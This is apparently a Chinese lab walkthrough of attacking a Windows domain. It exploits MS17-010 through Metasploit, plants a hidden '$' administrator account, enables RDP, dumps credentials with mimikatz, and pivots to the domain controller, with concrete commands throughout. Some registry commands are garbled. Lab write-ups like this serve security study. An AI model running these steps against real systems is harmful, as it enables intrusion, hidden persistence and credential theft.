赞
踩
1、子域主机:Windows7(192.168.162.134),加入域yst;
2、域控制器:Windows2008(192.168.162.150)
3、攻击主机:kali(192.168.162.131)
(1)、ip扫描
获取到子域主机IP:192.168.162.134
(2)、详细扫描
目标主机开放445端口,而且系统版本是win7或者2008,主机属于YST域;
该主机445端口开放,版本为win7或者2008,符合永恒之蓝漏洞(ms 17-010),所以进行尝试验证:
永恒之蓝漏洞:永恒之蓝漏洞讲解
配置目标主机,run,检测显示目标主机大概率存在ms17-010
使用攻击模块,这次为了进行域渗透,dump密码,所以我们要拿到更高权限的shell,因此我们要配置payload
配置完payload后,show options
我们需要配置rhost(目标主机IP)和lhost(本机IP)
配置完成后,再次show options查看:
进行攻击:exploit
反弹shell,进行权限查看:
成功拿到子域主机的system权限;
域名为:yst.com
(1)、新建用户
用户名后带$符,便于隐藏,用户在输入net user命令时,不显示;
(2)、net localgroup administrators rxx$ /add #将用户rxx$加入管理员组
(3)、开启3389端口
- 1、REG ADD HKLMYSYSTEMYCurrentControlSet\Control Terminal" "Server /v fDenyTSConnections /t REG DWORD /d 00000000 /f #开启3389端口
-
- 2、REG ADD HKLMYSYSTEMYCurrentControlSet\Control Terminal" "Server /v fDenyTSConnections /t REG DWORD /d 11111111 /f #关闭3389端口
(3)、远程登陆
rdesktop 192.168.162.134:3389 #linux下远程桌面连接命令
后门成功;
退出shell,加载猕猴桃(mimikatz),使用keberos模块获取明文密码
- 总结的方法如下:
- 1、在meterpreter下:
- (1)、run post/windows/gather/arp_scanner rhosts=192.168.162.0/24 #基于arp协议
- (2)、run post/multi/gather/ping_sweep rhosts=192.168.162.0/24 #基于ping命令
- (3)、meterpreter >info post/multi/gather/ping_sweep
- 2、进入shell,在cmd下:
- ipconfig /all #查看用户IP信息,主要观察DNS服务器IP
- route print #查看路由表
-
-
- 两种方法对照着来,判断内网域控主机的IP地址
通过DNS判断内网域控IP:192.168.162.150
- 1、shell下:
- C:\Windows\system32>exit #退出shell,返回到meterpreter
-
- 2、meterpreter下:
- meterpreter >backgroud #返回到msf
-
- 3、msf下:
- route add 192.168.162.134 255.255.255.0 1 #给msf添加路由,方便nmap进行内网扫描
-
- 路由添加成功后接下来进行内网扫描,方法如下:
- auxiliary/scanner/discovery/udp_sweep #基于udp协议发现内网存活主机
- auxiliary/scanner/discovery/udp_probe #基于udp协议发现内网存活主机
- auxiliary/scanner/netbios/nbname #基于netbios协议发现内网存活主机
- auxiliary/scanner/portscan/tcp #基于tcp进行端口扫描
-
- 4、选择要使用的模块:
- (1)、use auxiliary/scanner/discovery/udp_sweep
- set rhosts 192.168.162.150
- (2)、use auxiliary/scanner/discovery/udp_probe
- set rhosts 192.168.162.150
- (3)、use auxiliary/scanner/netbios/nbname
- set rhosts 192.168.162.150
- (4)、use auxiliary/scanner/portscan/tcp
- set rhosts 192.168.162.150
扫描结果如下:
域控主机445,3389端口开放,也可能存在ms17-010漏洞,但我们已经拿下了子域主机和域控管理员账号,所以直接利用3389进行远程连接;
(1)、kali连接域控:rdesktop 192.168.162.150:3389
(2)、通过猕猴桃查到的密码进行登录
域渗透完成。
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。